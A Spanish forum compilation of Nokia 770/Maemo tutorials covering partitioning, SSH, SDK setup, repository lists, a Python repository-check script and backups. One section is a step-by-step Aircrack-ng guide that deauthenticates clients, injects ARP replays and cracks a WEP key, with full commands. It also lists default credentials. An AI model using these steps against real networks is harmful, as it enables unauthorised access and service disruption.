echo “/var/lib/install/usr/bin/skey symbolic link appears to exist”
fi
#
if [ ! -h /var/lib/install/usr/sbin/sshd ]; then
echo “/var/lib/install/usr/sbin/sshd symbolic link does not appear to exist - creating”
ln -s /var/lib/install/sbin/sshd /var/lib/install/usr/sbin/sshd
else
echo “/var/lib/install/usr/sbin/sshd symbolic link appears to exist”
fi
-
[span style=\'font-size:9pt;line-height:100%\']AMPLIACIÓN DEL CAPITULO DE PARTICIÓN DE LA RS-MMC
[/span]
Extender el sistema de ficheros de la raíz y crear un swapspace (Partición de Swap) en la tarjeta RS-MMC, necesitamos RE-PARTICIONAR LA Tarjeta de Memoria.
La primera partición debe ser la partición de VFAT (FAT16).
Maemo trata esta partición como especial, si es VFAT al conectar el USB al PC esta se desmonta
Cualquier otra partición de Linux se puede preinstalar montandola en el N770 a través de “enlaces simbólicos/accesos directos” de esta partición “nueva” (Ext3) al sistema de ficheros de la raíz (64 Mb del N770).
1º Bootear/Arrancar tu PC con Linux y conexión como root.
2º Conectar el 770 con el USB.
3º # mkdir /mnt/770 para crear un punto del montaje.
4º # fdisk /dev/sda para particionar la tarjeta. Suprimir la partición actual del VFAT , crear un nuevo VFAT (más pequeño) partition1 y una partición del Linux (Ext3) en la tarjeta. Escribir la tabla y la salida de la partición.
5º # mkfs.vfat /dev/sda1 para crear el “Sistema de Archivos” del VFAT.
6º # mkfs.ext2 /dev/sda2 para crear el Sistema de Archivos Ext2. (Ext3 no es el más adecuado para una Flash como sistema de ficheros.
7º # mount /dev/sda2 /mnt/770 para montar la partición Ext2.
8º # dd if=/dev/zero of=/mnt/770/swapfile bs=1024 count=24576 para crear una partición Swap.
9º # mkswap /mnt/770/swapfile para formatear como Partición Swap
10º # umount /mnt/770 para desmontar la partición.
Desconectar el N770 del PC y reiniciarlo
*******************************************************
+++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------
[span style=\'font-size:9pt;line-height:100%\']Puesta al día de contraseñas [/span]
Hay 2 usuarios determinados en la imagen Original de Maemo.
User sin “pass” (de origen)
Root con pass oriunda “rootme”
# sudo gainroot para conectar al “SUPER-USUARIO ROOT”
# su -
# passwd -l root para inhabilitar la contraseña de root
# passwd root para cambiar la contraseña de root
# passwd user para cambiar la contraseña del usuario
*******************************************************
+++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------
[span style=\'font-size:9pt;line-height:100%\']Configurar el servidor SSH[/span]
Abrir el xterm.
# sudo gainroot cambia de User a"root".
# su -
# cd /var/lib/install/sbin’
# sh ./setup.sh
Reiniciar el N770. Abrís una conexión de RED al N770, y el SSH al N770 desde el PC.
Terminar cualquier configuración en la línea de comandos
*******************************************************
+++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------
[span style=\'font-size:9pt;line-height:100%\']Actualizar la localización de la base de datos
[/span]
Abrir una sesión del xterm
# sudo gainroot para cambiar de user a root
# su - para conseguir control del entorno
FYI – la mayoría de aplicaciones se localiza en /var/lib/install/usr/, y esta no esta en el path. Crearemos un “Enlace Simbólico” (symbolic link) en la sección apropiada del path (trayectoria)
# slocate -u para actualizar la localización de la base de datos. (se toma su tiempo)
# cd ~’
# vim .vimrc
Abierto el editor vim insertar
# set nocompatible , y salir
Ahora tienes instalado un “Terminal” xterm, un editor “vim” y has mapeado los directorios a “llamar/invocar” directamente.
*******************************************************
+++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------
La historia de los 770 En formato "html":
http://www.linuxdevices.com/articles/AT7621761066.html
En formato "pdf":
http://www.maemo.org/presentations/ari_jaaksi/Developing_770_with_Linux_and_OSS.pdf
Lo único malo es que el texto esta en ingles (el Html" se puede "pobre tráducir (http://www.linuxdevices.com/articles/AT7621761066.html))
[img]http://www.linuxdevices.com/files/misc/jaaksi-dec06-fig2-sm.jpg\" border=\"0\" class=\"linked-image\" /]
Pero cuanto menos esta curioso de leer / ojear
*******************************************************
+++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------
-
[span style=\'font-size:9pt;line-height:100%\']LiveCD for Maemo 1.1[/span]
http://maemo.org/maemowiki/LiveCD
Enlace pasado por el colega Lucky-Luke
Maemo Live CD es una distribución basada en Knoppix / Kanotix.
La última versión se puede descargar de [span style=\'font-size:25pt;line-height:100%\']AQUÍ (http://cdprojekte.mattiasschlenker.de/Public/Maemo_Live/)[/span]
Es la "Maemo_Live/0.5a" de 29-Jun-2005 (http://cdprojekte.mattiasschlenker.de/Public/Maemo_Live/0.5a/MaemoLive_0.5.1a.iso) de 663 Mb
Trabaja en una red del TCP/IP, entre máquinas conectadas o entre un PC central corriendo bajo el emulador VMware [PC virtual]
[img]http://cdprojekte.mattiasschlenker.de/Public/Maemo_Live/0.5a/maemolive05a.png\" border=\"0\" class=\"linked-image\" /]
El directorio de scratchbox está disponible desde samba, permite conexión SSH y el GUI de Maemo vía Xvnc.
1º Bootear el LiveCD de Maemo. Si no necesitas el GUI, editar/añadir la línea del "kernel" y agregar “3” al cargador al runlevel 3.
2º Utilizar el cliente SSH que prefieras para abrir una sesión de la distro de Maemo. El Login es “knoppix”, la PASS es “maemo”.
3º Configurar el entorno de trabajo
En la original dice
export DISPLAY=localhost:3.0
export LANGUAGE=en_GB
Admitira el Castellano?
export DISPLAY=localhost:3.0
export LANGUAGE=sp_SP
4º Comenzar/STAR el GUI de Maemo
/scratchbox/login
af-sb-init.sh start
5º Utilizar un visor-VNC para conectar con Xvnc, no olvidar conectar con la dirección “IP address: 3”, puesto que Xvnc está funcionando en el "display" 3.
6º Un servidor de samba proporciona acceso a
/home, /tmp y /scratchbox.
Si instalas el LIVE CD MAEMO a un disco duro "HD", nombrar al primer usuario “knoppix” o tendrás que cambiar la configuración del scratchbox.
....
[span style=\'font-size:21pt;line-height:100%\']Nokia 770 Internet Tablet[/span]
Running Scratchbox
James F. Carter
http://www.math.ucla.edu/~jimc/nokia770/scratchbox.html
http://www.quietearth.us/articles/2006/08/25/Nokia-770-Installing-the-Maemo-SDK
Traducido:
[span style=\'font-size:9pt;line-height:100%\']Nokia 770: Instalación del Maemo SDK[/span]
Las instrucciones en cómo instalar el sdk del maemo en
http://maemo.org/platform/docs/tutorials/Maemo_tutorial.html#Installing-Scratchbox
son realmente largas. Aquí está una manera más fácil:
1. Bajar el Script del instalador del Repositorio de maemo, la versión 2.0.
http://repository.maemo.org/stable/2.0/installer/installer
Necesitas una versión diferente o si lo prefieres una revisión (inestable):
http://maemo.org/downloads/download-sdk.html
2. Asegurate de tener instalada uudecode, en la mayoría de los distribuciones como en ubuntu el paquete sharutils no es incluido por el defecto.
# apt-get install sharutils
3. Run ./installer, pedirá tu contraseña de root para descargar los paquetes necesarios.
El instalador crea el “Grupo sbox “ y te agregará a él, así que después de que haya hecho necesitarás “log out” y “log back in”. El entorno del scratchbox ahora está instalado y lista para usar. Todo el esto es del FAQ en
http://maemo.org/platform/docs/tutorials/Maemo_tutorial.html#Installing-Scratchbox
Lanzar el Script de conexión para arrancar el entorno de desarrollo:
$ /scratchbox/login
Welcome to maemo Development Platform 2.0!
For further information please check out the official maemo website at
http://www.maemo.org/.
Copyright (c) 2005 Nokia
[sbox-SDK_PC: ~] >
Ahora creamos start-xephyr.sh:
#!/bin/sh -e
prefix=/scratchbox/users/${LOGNAME}/targets/SDK_PC/usr
export LD_LIBRARY_PATH=${prefix}/lib; export LD_LIBRARY_PATH
exec ${prefix}/bin/Xephyr :2 -host-cursor -screen 800x480x16 -dpi 96 -ac
Y lanzamos, ésta es como la más xnest que es una display nested de X específicamente para la plataforma del GUI del maemo.
$ start-xephyr.sh &
Y ahora configura nuestro display y carga encima del interfaz de usuario del maemo.
$ export DISPLAY=:2
$ af-sb-init.sh Stara
Si deseamos funcionar un programa de muestra:
$ run-standalone.sh program
Testado bajo dapper.
-
[span style=\'font-size:21pt;line-height:100%\']Esquema del Nokia 770, desmontar y montar[/span]
http://www.uselessinfo.pwp.blueyonder.co.uk/dismantlen770.htm
[span style=\'font-size:21pt;line-height:100%\']Conseguir acceso a todos los archivos en Nokia 770[/span]
La manera más rápida sin duda de "acceder a" la raiz/root (no confundir con el superusuario del mismo nombre) es esta:
Abrir el navegador WEB, y teclear;
/usr/
[img]http://img530.imageshack.us/img530/3756/navegadorroot1dm1.jpg\" border=\"0\" class=\"linked-image\" /]
Y tendras acceso a todos los archivos de tú NOKIA 770
[img]http://img530.imageshack.us/img530/3986/navegadorroot2fw6.jpg\" border=\"0\" class=\"linked-image\" /]
Por ejemplo para comprobar que "programas" se instalaron de la Suite Aircrack, clickas sobre usr/sbin/ y podras ver:
aireplay, airmon, airodump, arpspoof todos de extensión -ng (Next Generation) y por supuesto el resto de aplicaciones...
¿Que utilidad puede reportar acceder a "la raiz de archivos"?
Una sencilla para los habituales de Windows y que no estan muy hechos a Linux su sistema de archivos y editar (desde VIM* modo texto) los directorios, siempre gráficamente se observa y se hace una mejor idea de donde estamos.
* Editor de texto VIM
¿Como se usa?
Arranca VIM: VIM /etc/X11/xorg.conf
Desde el modo de edición : insert key
Salvar edición : tecla de esc seguida de “:write”
SALIR de VIM : tecla de esc seguida de “:q”
Hay otra opción más elegante y es crear un "acceso directo" que se dice en windows y enlace simbolico que se llama en Linux
¿Como? fácil desde el emulador de "X" es decir el XTerm (Konsole o Terminal, la Shell u interprete de comandos de nuestro Linux)
Hacemos un ls
* ls
y ahora entramos en MyDocs con "cd/directorio"
* cd ~/MyDocs
y seguido:
* ln -s / Root
Comprobamos los cambios en nuestra N770, abrimos el menu, y el Administrador de Archivos, donde aparecera el enlace de ROOT (creo que por un bug de la tráducción a Castellano, aparece como Roor, ¡es eso! o que soy tan bruto que tecleé mal el Link simbolico, que no es de extrañar jejeje) y comprobamos que tenemos acceso directo a todos los archivos de nuestra distribución Maemo N770
[img]http://img530.imageshack.us/img530/4907/desdexterm3bv5.jpg\" border=\"0\" class=\"linked-image\" /]
Tambien puedes de este modo hacer mas enlaces directos o simbolicos (como prefieras)
Que lo disfrutes
[span style=\'font-size:21pt;line-height:100%\']Matar "kill" procesos en n770 desde Xterm[/span]
Es bien fácil y muy útil
Para los que desembarcan de Windows, matar un proceso sería un caso "parecido" (desde XP) a presionar Ctrl+Alt+Supr y desde el Administrador de Tarear (Windows) ver los procesos y eliminar aquellos que se "han colgado" mediante ratón derecho y Terminar Proceso
En Linux la cosa es más eféctiva, en windows estos cuelgues suelen acabar con el "reboot" de la maquina, o la inactividad completa del equipo
Desde nuestra N770 debemos 1º de localizar "todos" los procesos (windows solo muestra una parte) y saber ual es el que entorpece nuestra maquina, que va definido por "tres" cifras:
Con el cmd "ps U" desde Xterm
# ps U
Encontramos los procesos (una larga lista) y el dueño "root, user, systemui (normalmente nosotros trabajamos desde "gainroot" así que tendremos acceso a todos ellos siempre que tengamos activado (I+D) R&D)
Cada proceso lo vemos en una linea 1º un nº de 3 cifras (nº de proceso) y despues el dueño del proceso (+ una seríe de datos), esto puede ser útil de cara a "matar" algún proceso
# kill 891
que en mi ejemplo corresponde a "wlancond"
Por si le sirve a alguien
-
[span style=\'font-size:25pt;line-height:100%\']Instalación de aplicaciones y uso repositorios 2006[/span]
El SO 2k6 permite instalar aplicaciones directamente desde un archivo o a través de repositorios. Siempre será mejor usar repositorios para poder aprovecharse de las actualizaciones automáticas y la gestión de dependencias.
Para usar los repositorios debemos introducir cierta información en el instalador de aplicaciones:
Ir al menú de la N770; Herramientas->Administrador de aplicaciones.
Abrir el menú y Herramientas->Catálogo de aplicación; con lo que se abre la ventana del catálogo. Para introducir un repositorio nuevo picar el boton Nueva y rellenar los campos con al información del repositorio. Antes de aceptar comprobar que quede Activado (si nos interesa) pulsar Aceptar. Si editamos algún repositorio o añadimos uno nuevo, al cerrar el catálogo, nos preguntará si queremos actualizar la lista de paquetes. Normalmente responderemos Si. Si todo va OK al cabo de unos cuantos kB de descarga actualizará la lista y nos devuelve a la ventana principal del Admin. Esta actualización puede fallar si al Admin. no consigue conectar con algún repositorio, bien porque el servidor esté caido o porque hallamos escrito mal algunos de los datos del repositorio ( a mi ya me pasaron las dos cosas). Una posible solución es ir al catálogo e ir desactivando repositorios hasta localizar el conflctivo.
Una vez con la lista actualizada picamos en Instalar aplicaciones nuevas y entramos en una pantalla que nos permite consultar la lista de aplicaciones disponibles para instalar: Todo-> todas ellas; y diversas categorías. Picamos el botón que nos convenga y ya se despliega la lista de aplicaciones, en la que podemos seleccionar e instalar la que nos interese.....
Cada cierto tiempo conviene actualizar la lista de aplicaciones mediante Herramientas->Actualizar lista de paquetes; o si solemos estar conectados a la red se puede hacer automáticamente en Herramientas->Ajustes
Otra función interesante es Buscar actualizaciones; que nos busca actualizaciones de las aplicaciones instaladas. Al picar este boton se revisan las aplicaciones y, si es el caso, nos pregunta si deseamos actualizar la aplicación correspondiente. Si respondemos Si se procede a la actualización.
Por último podemos instalar paquetes sueltos mediante Paquete->Instalar desde archivo....; que abrira el navegador de archivos para localizar el paquete en nuestra N770.
Al fin y al cabo, el Admin. no es más que un front-end del impresionante gestor de paquetes de Debian: atp-get, que por supuesto puede usarse directamente en consola; pero eso es otra historia....
... tenemos el sources.list que esta en
/etc/apt/sources.list
Desde XTerminal
1º Tomamos valor de Admin
sudo gainroot
2º Copiamos el Source.list a nuestra RS-MMC
cp /etc/apt/sources.list /media/mmc1
3º Mod. lo resubimos
cp /media/mmc1/sources.list /etc/apt/
https://garage.maemo.org/snippet/detail.php?type=snippet&id=1
LAPA, hizo un script para corregir "el mensajito de que ha caido un repositorio" un script en python para que actualice el sources.lst. Lo pongo aquí por si alguien lo encuentra útil:
* Si somos "tradicionalistas" en este caso le pondremos una extensión .py porque es un script de python.
En linux se ejecutan los programas que tienen permisos de ejecución, independientemente de su nombre. La forma mas sencilla de dar permisos de ejecucion (generalmente no se dan por defecto) es con el comando chmod.
Dos ejemplos:
Mister A decide probar el script y lo guarda en un archivo de texto llamado "aver", así sin extensión. Suponendo que esté en el mismo directorio en que está el script, para darle permisos de ejecución escribiría en consola Código:
chmod +x aver
Para ejecutarlo haría:
./aver
Mister B decide probar el script y lo guarda en un archivo de texto llamado "source.py", con extensión py porque está escrito en python. Suponendo que esté en el mismo directorio en que está el script, para darle permisos de ejecución escribiría en consola Código:
chmod +x source.py
Para ejecutarlo haría:
./source.py
Como puedes ver el nombre del archivo no es relevante, solo es informativo para el usuario, al sistema le da igual como se llame o que extensión tenga.
Si la red está caida el script aborta con un error IO. Lo que me gustaría hacer es levantar la red en este caso, pero no sé como. ¿Alguna idea? :
El Script
#!/usr/bin/python
import urllib
import re
import os
comando="ifconfig | grep wlan0"
tp=os.popen(comando)
salida=tp.readlines()
tp.close()
if not salida:
raise IOError,'No hay conexion a la red'
FUENTE="/etc/apt/sources.list"
cambio=False
source=open(FUENTE,"r")
fich=source.readlines()
source.close()
for k in range(len(fich)):
i=fich[k]
if re.search("http",i):
if re.search("^#",i):
vest=False
else:
vest=True
a=i.split()
print "intentando",a[1],
try:
fp=urllib.urlopen(a[1])
fp.close()
aux="deb"
print "---> SI"
mcambio= not vest
except:
aux="#deb"
print "--> NO"
mcambio=vest
if mcambio:
cambio=True
for j in range(1,len(a)):
aux=aux+" "+a[j]
aux=aux+'\n'
fich[k]=aux
print "\n ------------- 0 0 -------------\n"
if cambio:
print "Hay cambios. Reescribiendo el fichero sources list"
source=open(FUENTE,"w")
for i in fich:
source.write(i)
source.close()
else:
print "Fichero sources.list sin cambios desde el ultimo control"
El problema está en el repositorio http://www.fulminati.org (http://www.fulminati.org) . No es un problema de timeout (el fichero Packages.gz se localiza y descarga bien; probar aqui ). Por lo que pude googlear ( aqui ) el problema son las líneas "Depends:" vacias, que apt-get no puede procesar ( ); o no deberían estar o debían ser "Depends: none". Esto ya se escapa un poco del ámbito del script.....
https://garage.maemo.org/snippet/detail.php?type=snippet&id=1
Los repositorios actualizados a 11 de Diciembre de 2006, quedarian tal que así;
[span style=\'font-size:30pt;line-height:100%\']MI LISTA[/span]
#maemo:essential
deb http://catalogue.tableteer.nokia.com/certified/ mistral user
deb http://catalogue.tableteer.nokia.com/non-certified/ mistral user
deb http://repository.maemo.org/contrib mistral free
deb http://repository.maemo.org/contrib mistral non-free
deb http://repository.maemo.org mistral free
deb http://repository.maemo.org mistral non-free
deb http://repository.maemo.org/extras/ mistral free non-free
deb http://repository.maemo.org/ mistral free non-free
deb http://repository.maemo.org/ scirocco free non-free
deb http://repository.maemo.org/extras 2.0 free non-free
deb http://downloads.kernelconcepts.de/maemo2 mistral free
deb http://maemo-hackers.org/apt/ mistral main
deb http://maemo.o-hand.com/packages mistral/
deb http://maemo.org.br/platform/apt mistral user
deb http://www.mulliner.org/nokia770/repository/ maemo2 free
deb http://bgran.net/etrunko/apt mistral user
deb http://people.freedesktop.org/~skaboy/maemo/fuse mistral user
deb http://mg.pov.lt/770 mistral user other
deb http://yerga.xtremservers.net/maemo/ mistral/
deb http://www.math.ucla.edu/~jimc/nokia770 mistral user
deb http://openbossa.indt.org/canola/repository/ scirocco user
deb http://gnuite.com:8080/nokia770 mistral user
deb http://only.mawhrin.net/fbreader/maemo/ mistral user
deb http://www.oakcourt.dyndns.org/maemo/ ./
deb http://mg.pov.lt/770 mistral user other experimental
deb http://home.ufam.edu.br/~agan/minimo/ mistral/
deb http://marceloeduardo.com/apt mistral games
deb http://eko.one.pl/maemo mistral user
[span style=\'font-size:30pt;line-height:100%\']LA LISTA OFICIAL;[/span]
http://www.maemo.org/maemowiki/Application...oriesSourceList (http://www.maemo.org/maemowiki/ApplicationRepositoriesSourceList)
última edición 24-0CT-2006
#maemo:essential
deb http://catalogue.tableteer.nokia.com/certified/ mistral user
deb http://catalogue.tableteer.nokia.com/non-certified/ mistral user
deb http://repository.maemo.org/extras mistral free non-free
deb http://repository.maemo.org/ mistral free non-free
deb http://maemo-hackers.org/apt/ mistral main
deb http://only.mawhrin.net/fbreader/maemo/ mistral user
deb http://downloads.kernelconcepts.de/maemo2 mistral free
deb http://www.mulliner.org/nokia770/repository/ maemo2 free
deb http://www.oakcourt.dyndns.org/maemo/ ./
deb http://maemo.o-hand.com/packages mistral/
deb http://mg.pov.lt/770 mistral user other
deb http://bgran.net/etrunko/apt mistral user
deb http://people.freedesktop.org/~skaboy/maemo/fuse mistral user
deb http://www.maemo.org.br/VoIP/apt mistral main
deb http://scriptkiller.de/apt/ mistral main
deb http://www.math.ucla.edu/~jimc/nokia770 mistral user --> server not responding as of 24/Aug/2006
deb http://www.maemo.org.br/platform/apt mistral user
deb http://hl.homelinux.org maemo/
deb http://home.ufam.edu.br/~agan/minimo/ mistral/
deb http://marceloeduardo.com/apt mistral games
[span style=\'font-size:25pt;line-height:100%\']http://maemo.org/maemowiki/ApplicationRepositories (http://maemo.org/maemowiki/ApplicationRepositories)[/span][/code]
-
¿Has podido aguantar la respiración mientras escribías todo eso? , que currada.
-
-Post en Construcción-
[span style=\'font-size:25pt;line-height:100%\']Aircrack-ng[/span]
Aircrack-ng 0.5 es un paquete de herramientas destinadas al monitoreo y análisis de redes inhalámbricas con el que podremos poner a prueba la seguridad del cifrado de conexiones WEP (Wired Equivalent Privacy) y WPA (Wi-Fi Protected Access).
Una vez ejecutemos el programa, podremos capturar paquetes de información de una red concreta (o de las que sea capaz de detectar nuestra tarjeta) con una de las herramientas incluidas en Aircrack-ng 0.5: Airodump, un sniffer que se encargará de capturar los paquetes necesarios para llevar a cabo la operación con éxito.
Cuando los paquetes capturados sean suficientes, sólo tendremos que cargarlos con Aircrack para que éste descifre la clave y podamos acceder a la red a la que pertenezcan.
Nota:
Aircrack trabaja con WEP 802.11 y WAP-PSK.
* HomePage: http://www.aircrack-ng.org (http://www.aircrack-ng.org)
* Status: stable
* PortPage: http://www.mulliner.org/nokia770/ (http://www.mulliner.org/nokia770/)
* Download: http://www.mulliner.org/nokia770/feed/airc...g_0.5-1_arm.deb (http://www.mulliner.org/nokia770/feed/aircrack-ng_0.5-1_arm.deb)
The aircrack-ng wireless security toolkit. Requires shell access and root.
mug-usbnet
Necesitamos Xterm y derechos de superusuario
X Terminal Emulator (xterm)
* Home Page: http://770.fs-security.com/xterm/ (http://770.fs-security.com/xterm/)
http://maemo-hackers.org/wiki/OssoXterm
*********************************************************
*********************************************************
[span style=\'font-size:25pt;line-height:100%\']VAMOS CON LOS COMANDOS Y PROGRAMAS DE LA SUITE [/span]
[span style=\'font-size:30pt;line-height:100%\']Aircrack-ng del N770[/span]
**********************************************************
**********************************************************
Nokia770-39:~# aircrack-ng
Aircrack-ng 0.5 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aircrack-ng [options] <.cap / .ivs file(s)>
Common options:
-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-q : enable quiet mode (no status output)
Static WEP cracking options:
-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d <start> : debug - specify beginning of the key
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length : 64/128/152/256/512
-i <index> : WEP key index (1 to 4), default: any
-f <fudge> : bruteforce fudge factor, default: 2
-k <korek> : disable one attack method (1 to 17)
-x : disable two last keybytes bruteforce
-y : experimental single bruteforce mode
WPA-PSK cracking options:
-w <words> : path to a dictionary file
**********************************************************
**********************************************************
Nokia770-39:~# aireplay-ng
Aireplay-ng 0.5 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
attack modes:
--deauth count : deauthenticate all stations
--fakeauth delay : fake authentication with AP
--interactive : interactive frame selection
--arpreplay : standard ARP-request replay
--chopchop : decrypt/chopchop WEP packet
**********************************************************
**********************************************************
Nokia770-39:~# airodump-ng
Airodump-ng 0.5 - © 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org (http://www.aircrack-ng.org)
usage: airodump-ng <options> <interface>
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix (mandatory)
-w : same as --write
By default, airodump-ng hop on 2.4Ghz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channel> : Capture on a specific channel
-c : Same as --channel
-a : Will hop on 5Ghz channels
--abg : Will hop on 2.4Ghz channels
**********************************************************
**********************************************************
[span style=\'font-size:25pt;line-height:100%\']Ejemplo de uso;[/span]
1. Con Kismet o con airodump-ng seleccionar el AP (punto de acceso) "objetivo", desde Kismet, clasificar los AP's usando "S" seguido de "C". Seleccionar tu AP "Enter" para coger la información (MAC Address, WEP, Channel etc.) Presiona "q" para dejar la pantalla, y con mi AP selecciona tecleando "L"
2. Abrir consola de comandos, AiroDump para "sniffar" los paquetes
Cmd= airodump-ng -w capture -c 0 wlan0
OK, "airodump-ng" es el programa de la suite de aircrack
"-w capture" Captura -write- los packetes sniffados con extensión "capture.cap".
"-c 0" Selecciona el nº de canal "0", del ejemplo "sniffara" de todos los canales, seleccionado un número del 1 al 11, del objetivo elegido solamente.
"wlan0" El nombre de mi dispositivo wireless dado por el tipo de chipset "Prism2"
Desde airodump-ng, seleccionamos la MAC address del objetivo AP y los packets/data capturados los Data IV's)
3. Abrir otra consola, con AirePlay realizamos un ataque para "deautenticacar a la maquina seleccionada "el objetivo" conectado al AP para desconectar la maquina seleccionada y forzar la reconexión con el AP, en este proceso el AP enviara paquetes que incluiran la WEP key.
Cmd = aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 wlan0
"aireplay-ng" incluido en la suite aircrack-ng
"-e DLINK" nombre del SSID del objetivo del AP.
"-a 00:11:22:33:44:55" MAC address del objetivo AP.
"-c 66:77:88:99:00:AA" es la MAC address de la maquina seleccionada conectada al AP (debes poder encontrar cualquier máquina conectada con el AP, observando la Info de AiroDump).
"--deauth 10" el tipo de ataque realizado, al este caso, el ataque de DEAUTH repetido 10 veces.
"wlan0" el nombre de mi AP.
Preparamos este comando pero no lo enviamos todavia (recomendado el copy-paste al carecer de teclado fisico)
4. Abrir otra pantalla en consola, volver a AIREPLAY, capturar los paquetes que pudieran contener cualquier dato, bombear al AP “fingiendo” ser la máquina receptora que el otro caso de Aireplay realizó el ataque de DEAUTH
Cmd= aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA wlan0
"aireplay-ng" otro programa de la suite aircrack-ng
"--arpreplay" es la funcion de aireplay planificada, en este caso repite una peticion ARP, que contendra paquetes IV´s
"-b 00:11:22:33:44:55" MAC del objetivo AP.
"-h 66:77:88:99:00:AA" MAC de la maquina seleccionada conectada al AP. STATION
"wlan0" ...
Lanzado el comando, deberia de buscar los paquetes.
El commando anterior inicia la deautenticación, cambiar a aireplay (lo teniamos preparado) en la otra pantalla. Deberias de detectar deauth/discon de la maquina, que captura paquetes, y comenzar a bombardear al nuevo AP by simulando ser la maquina receptora.
Clickar sobre la ventana de airodump y esperar a conseguir paquetes y IV resultante de la inyección.
Puedes cerrar la ventada de deautenticacion de aireplay "una vez asociados los puntos AP de atacante y Objetivo" y dejar la otra ventana, llamando "petición de ARP" -replaying- hasta conseguir los paquetes necesarios para crackear la llave WEP.
5. Abrir la pantalla FINAL de la consola, AirCrack explorara los paquetes capturados de AiroDump.
Cmd= aircrack-ng -f 4 -m 00:11:22:33:44:55 -n 64 capture.cap
"aircrack-ng" Nombre del programa de la misma suite.
"-f 4" corre el Fudgefactor 4 veces
"-m 00:11:22:33:44:55" MAC address del objetivo AP.
"-n 64" los pedacitos de bits que componen la key, puede ser de 64-bit, de 128-bit... etc.
"capture.cap" Nombre del "file" capturado por AiroDump "puedes poner el que te plazca.
Encender y apagar, depende de la velocidad de tu PC, pocos IV's pueden contener tu key si es debil (yo con 80.000 una vez me hice con una) lo normal suelen ser 250.000 paquetes, algunas veces la cosa se desmadra hasta el Millón (si) 1.000.000 de paquetes... y BINGO! encontraras la key.
Testarlo sobre tú propio AP para comprobar la seguridad de vuestra key, podeis usar vuestro N770.
************************************************************
************************************************************
**********************************************************
**********************************************************
[span style=\'font-size:25pt;line-height:100%\']Problemas que plantea "aircrack-ng" en nuestro gachet Nokia 770
[/span]
* La captura de paqutes "IV´s, CAP´s, se realiza en "root/directorio" de flash memory (64 Mb) lo que conlleva un pequeño inconevniente de reduccion de rendimiento según aumentan los paquetes y se achica nuestra flash
- el comando rm, elimina los paquetes de "cd root" tras un ls, "rm paquete.iv"
* el cmd; airmon-ng ¡dá un ERROR!
/usr/sbin/iwpriv
usage: airmon-ng [channel]
Interface Chipset Driver
/usr/sbin/airmon-ng: 16: Syntax C: "(" unexpected)
-
[span style=\'font-size:21pt;line-height:100%\']Backup en NOKIA 770[/span] (por LAPA)
En la consola, como root, haces:
mv /home/user /media/mmc2/
ln -s /media/mmc2/user /home/user
los comandos:
mv mueve ficheros o directorios, en lo posible respetando permisos y propietarios. En este caso movemos todo el directorio user a la tarjeta. Yo lo pongo en una 2ª partición con sistema de ficheros ext2 (de ahí el mmc2), por un problema de permisos. Desde la partición vfat (mmc1, que es la que existe por defecto) no se pueden lanzar ejecutables (ni compilados ni scripts) y yo tengo unos cuantos. Al ejecutar este comando desaparece el directorio user de /home y debe aparecer un directorio user (con todo su contenido) en /media/mmc2.
ln hace un enlace entre nodos (directorios o archivos) del sistema de ficheros. En este caso hacemos un enlace blando (-s). Con este comando creamos un enlace en el directorio /home, llamado user que dirige todas las peticiones a /home/user hacia /media/mmc/user. Así "engañamos" a la máquina y conseguimos tener el directorio del usuario en la tarjeta.
PD: Cuando se hace un cacharreo fuerte como en este caso siempre es conveniente hacer una copia de seguridad. En la N770 puedes hacer:
tar -cpzv /home/user -f /media/mmc1/seguro
con lo que creas una copia de exacta de tu /home/user en la partición vfat, con nombre seguro. Para restaurarla tendrías que hacer (posiblemente como root):
tar -xzvf /media/mmc1/seguro
¿cómo se debería hacer solo para restaurar partes del backup hecho con el tar?
man tar
--exclude FICHERO
excluye el fichero FICHERO
-X, --exclude-from FICHERO
excluye ficheros listados en FICHERO
Aunque lo lógico sería hacer el backup solo de lo que interese::
tar opciones fich1/dir1 fich2/dir2 ....... -f backup
[span style=\'font-size:21pt;line-height:100%\']Maemo 1.1 RC5 "Entorno de desarrollo" [120 Mb][/span]
[img]http://scr.softonic.com/s2/45000/45957/0_maemo_01.jpg\" border=\"0\" class=\"linked-image\" /]
[span style=\'font-size:25pt;line-height:100%\']Entorno de desarrollo de aplicaciones para el Nokia 770[/span]
Ahora que ya es oficial, el Nokia 770 Internet Tablet ya está en los escaparates (desde 2005), salen toda una serie de herramientas, entre otras este entorno de programación que nos permitirá crear aplicaciones para el Nokia 770.
Maemo es un entorno de desarrollo para Nokia 770, dispositivo basado en Linux y corriendo cualquier software diseñado para Linux, con algunos ajustes eso sí. Maemo tiene por objetivo convertir los componentes Linux presentes hoy en día en cualquier buena distribución que se precie, de tal forma que se adapten al entorno de los dispositivos portátiles tipo Nokia 770 y demás.
